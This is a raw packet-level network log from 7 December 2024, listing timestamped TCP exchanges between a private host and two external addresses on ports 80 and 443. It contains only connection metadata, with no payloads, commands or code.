Dec 7, 2024 13:00:01.359416008 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.359462023 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.359643936 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.359685898 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.360483885 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.360532045 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.360662937 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.360707998 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.361613989 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.361664057 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.361805916 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.361851931 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.362585068 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.362627983 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.362799883 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.362844944 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.363672972 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.363722086 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.363837957 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.363881111 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.364653111 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.364700079 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.364841938 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.364887953 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.365760088 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.365804911 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.365921021 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.365964890 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.366738081 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.366801023 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.366962910 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.367007971 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.367844105 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.367892981 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.368046045 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.368088007 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.368901014 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.368949890 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.369077921 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.369153976 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.369898081 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.369950056 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.390834093 CET	443	49833	13.107.246.63	192.168.2.7
Dec 7, 2024 13:00:01.391293049 CET	49833	443	192.168.2.7	13.107.246.63
Dec 7, 2024 13:00:01.391328096 CET	443	49833	13.107.246.63	192.168.2.7
Dec 7, 2024 13:00:01.391767979 CET	49833	443	192.168.2.7	13.107.246.63
Dec 7, 2024 13:00:01.391772985 CET	443	49833	13.107.246.63	192.168.2.7
Dec 7, 2024 13:00:01.398205996 CET	443	49830	13.107.246.63	192.168.2.7
Dec 7, 2024 13:00:01.401676893 CET	443	49830	13.107.246.63	192.168.2.7
Dec 7, 2024 13:00:01.401731014 CET	443	49830	13.107.246.63	192.168.2.7
Dec 7, 2024 13:00:01.401738882 CET	49830	443	192.168.2.7	13.107.246.63
Dec 7, 2024 13:00:01.401802063 CET	49830	443	192.168.2.7	13.107.246.63
Dec 7, 2024 13:00:01.401844025 CET	49830	443	192.168.2.7	13.107.246.63
Dec 7, 2024 13:00:01.401855946 CET	443	49830	13.107.246.63	192.168.2.7
Dec 7, 2024 13:00:01.401865959 CET	49830	443	192.168.2.7	13.107.246.63
Dec 7, 2024 13:00:01.401870966 CET	443	49830	13.107.246.63	192.168.2.7
Dec 7, 2024 13:00:01.404273987 CET	49835	443	192.168.2.7	13.107.246.63
Dec 7, 2024 13:00:01.404305935 CET	443	49835	13.107.246.63	192.168.2.7
Dec 7, 2024 13:00:01.404380083 CET	49835	443	192.168.2.7	13.107.246.63
Dec 7, 2024 13:00:01.404512882 CET	49835	443	192.168.2.7	13.107.246.63
Dec 7, 2024 13:00:01.404524088 CET	443	49835	13.107.246.63	192.168.2.7
Dec 7, 2024 13:00:01.507179976 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.507251024 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.507339954 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.507390976 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.507812023 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.507860899 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.508219957 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.508269072 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.508725882 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.508773088 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.508965969 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.509033918 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.509708881 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.509757996 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.509872913 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.509921074 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.510607958 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.510662079 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.510791063 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.510838985 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.511717081 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.511768103 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.511851072 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.511904955 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.512749910 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.512799978 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.512934923 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.512986898 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.513951063 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.514000893 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.514168024 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.514218092 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.514802933 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.514849901 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.514981985 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.515027046 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.515830994 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.515878916 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.516084909 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.516132116 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.516959906 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.517008066 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.517096996 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.517144918 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.517968893 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.518018007 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.518152952 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.518199921 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.518980026 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.519047976 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.519201040 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.519249916 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.520086050 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.520136118 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.520283937 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.520332098 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.521128893 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.521197081 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.521258116 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.521315098 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.522110939 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.522160053 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.522314072 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.522361040 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.523161888 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.523210049 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.523361921 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.523411036 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.524203062 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.524251938 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.524447918 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.524518967 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.525480032 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.525527954 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.526012897 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.526062012 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.526385069 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.526434898 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.526770115 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.526818991 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.527424097 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.527473927 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.527569056 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.527618885 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.528429031 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.528479099 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.528599977 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.528647900 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.529448986 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.529491901 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.529653072 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.529696941 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.530540943 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.530590057 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.530745029 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.530805111 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.531624079 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.531694889 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.531838894 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.531888008 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.532710075 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.532757044 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.532916069 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.532963037 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.533737898 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.533786058 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.533900023 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.533948898 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.534727097 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.534775019 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.534889936 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.534950972 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.535897017 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.535945892 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.536077976 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.536123037 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.536792994 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.536835909 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.536997080 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.537046909 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.537831068 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.537879944 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.538054943 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.538100004 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.538877964 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.538925886 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.539057970 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.539102077 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.539918900 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.539968014 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.540118933 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.540159941 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.541018963 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.541075945 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.541183949 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.541234016 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.541991949 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.542059898 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.542263031 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.542313099 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.543097019 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.543144941 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.543281078 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.543335915 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.544116020 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.544166088 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.544298887 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.544348001 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.545151949 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.545200109 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.545353889 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.545406103 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.546180964 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.546230078 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.546380043 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.546427965 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.547255993 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.547307014 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.547454119 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.547502995 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.548285961 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.548335075 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.548501015 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.548547029 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.549345970 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.549396038 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.549552917 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.549602032 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.550375938 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.550424099 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.550551891 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.550615072 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.551424026 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.551471949 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.551629066 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.551675081 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.552474022 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.552524090 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.552716970 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.552762985 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.553528070 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.553575993 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.553705931 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.553754091 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.554570913 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.554615021 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.554749966 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.554795980 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.555613995 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.555660963 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.555815935 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.555855036 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.556719065 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.556766987 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.556879044 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.556925058 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.557722092 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.557763100 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.557923079 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.557972908 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.558749914 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.558835983 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.558952093 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.558993101 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.559808016 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.559854031 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.560004950 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.560051918 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.560883045 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.560935974 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.561088085 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.561157942 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.561863899 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.561911106 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.618805885 CET	443	49834	13.107.246.63	192.168.2.7
Dec 7, 2024 13:00:01.619303942 CET	49834	443	192.168.2.7	13.107.246.63
Dec 7, 2024 13:00:01.619324923 CET	443	49834	13.107.246.63	192.168.2.7
Dec 7, 2024 13:00:01.619796991 CET	49834	443	192.168.2.7	13.107.246.63
Dec 7, 2024 13:00:01.619801998 CET	443	49834	13.107.246.63	192.168.2.7
Dec 7, 2024 13:00:01.695637941 CET	443	49832	13.107.246.63	192.168.2.7
Dec 7, 2024 13:00:01.696218014 CET	443	49831	13.107.246.63	192.168.2.7
Dec 7, 2024 13:00:01.698950052 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.699013948 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.699084044 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.699124098 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.699280977 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.699327946 CET	443	49832	13.107.246.63	192.168.2.7
Dec 7, 2024 13:00:01.699335098 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.699373960 CET	49832	443	192.168.2.7	13.107.246.63
Dec 7, 2024 13:00:01.699450016 CET	49832	443	192.168.2.7	13.107.246.63
Dec 7, 2024 13:00:01.699459076 CET	443	49832	13.107.246.63	192.168.2.7
Dec 7, 2024 13:00:01.699469090 CET	49832	443	192.168.2.7	13.107.246.63
Dec 7, 2024 13:00:01.699472904 CET	443	49832	13.107.246.63	192.168.2.7
Dec 7, 2024 13:00:01.699718952 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.699764013 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.700092077 CET	443	49831	13.107.246.63	192.168.2.7
Dec 7, 2024 13:00:01.700182915 CET	49831	443	192.168.2.7	13.107.246.63
Dec 7, 2024 13:00:01.700182915 CET	49831	443	192.168.2.7	13.107.246.63
Dec 7, 2024 13:00:01.700182915 CET	49831	443	192.168.2.7	13.107.246.63
Dec 7, 2024 13:00:01.700342894 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.700388908 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.700514078 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.700557947 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.701395988 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.701445103 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.701576948 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.701618910 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.702110052 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.702166080 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.702300072 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.702349901 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.702619076 CET	49836	443	192.168.2.7	13.107.246.63
Dec 7, 2024 13:00:01.702637911 CET	443	49836	13.107.246.63	192.168.2.7
Dec 7, 2024 13:00:01.702723026 CET	49836	443	192.168.2.7	13.107.246.63
Dec 7, 2024 13:00:01.702888966 CET	49836	443	192.168.2.7	13.107.246.63
Dec 7, 2024 13:00:01.702907085 CET	443	49836	13.107.246.63	192.168.2.7
Dec 7, 2024 13:00:01.703144073 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.703219891 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.703337908 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.703355074 CET	49837	443	192.168.2.7	13.107.246.63
Dec 7, 2024 13:00:01.703392029 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.703392982 CET	443	49837	13.107.246.63	192.168.2.7
Dec 7, 2024 13:00:01.703495979 CET	49837	443	192.168.2.7	13.107.246.63
Dec 7, 2024 13:00:01.703608036 CET	49837	443	192.168.2.7	13.107.246.63
Dec 7, 2024 13:00:01.703618050 CET	443	49837	13.107.246.63	192.168.2.7
Dec 7, 2024 13:00:01.704207897 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.704255104 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.704472065 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.704515934 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.705246925 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.705291986 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.705430984 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.705476999 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.706330061 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.706374884 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.706803083 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.706846952 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.707453012 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.707499981 CET	49829	80	192.168.2.7	185.215.113.16
